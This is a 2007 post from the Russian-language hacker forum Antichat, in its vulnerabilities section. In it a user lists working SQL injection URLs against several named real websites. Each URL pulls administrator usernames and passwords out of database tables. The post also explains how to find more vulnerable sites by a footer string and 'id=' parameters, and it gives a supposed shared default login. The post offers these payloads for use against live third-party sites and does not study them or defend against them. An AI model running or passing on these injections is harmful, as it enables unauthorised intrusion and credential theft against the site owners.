ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 01.12.2007, 02:33
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
Lightbulb

http://www.marstonsdontcompromise.co.uk/ Сайт о пиве, особенно понравилось пиво с названием "Pedigree"

Код:
http://www.marstonsdontcompromise.co.uk/site/news_story.asp?news_id=1+or+1=(SELECT+TOP+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+ashes_admin)--
Походу нашел уязвимость: ищем сайты с надписью "Site by EMAC2.SCREEN". Уязвимые скрипты - все где присутствует "id=" . В основном "xxx_list.asp?id=".
Exploit: 1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27 %3A%27%2Bcast(password+as+n
varchar)+from+admins)--

Логи и пароль кстати тоже всегда одинаковые - guillaume : plop

Примеры:

http://www.chiefinspiration.com

Код:
http://www.chiefinspiration.com/index.asp?news_id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--
http://www.benoitoctave.com/

Код:
http://www.benoitoctave.com/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--
http://travel.youressentialmix.com

Код:
http://travel.youressentialmix.com/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--
http://tv.blogilvy.be/

Код:
http://tv.blogilvy.be/books_list.asp?id=1+or+1=(SELECT+TOP+1+cast(login+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+admins)--

Последний раз редактировалось Ded MustD!e; 01.12.2007 в 03:08..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ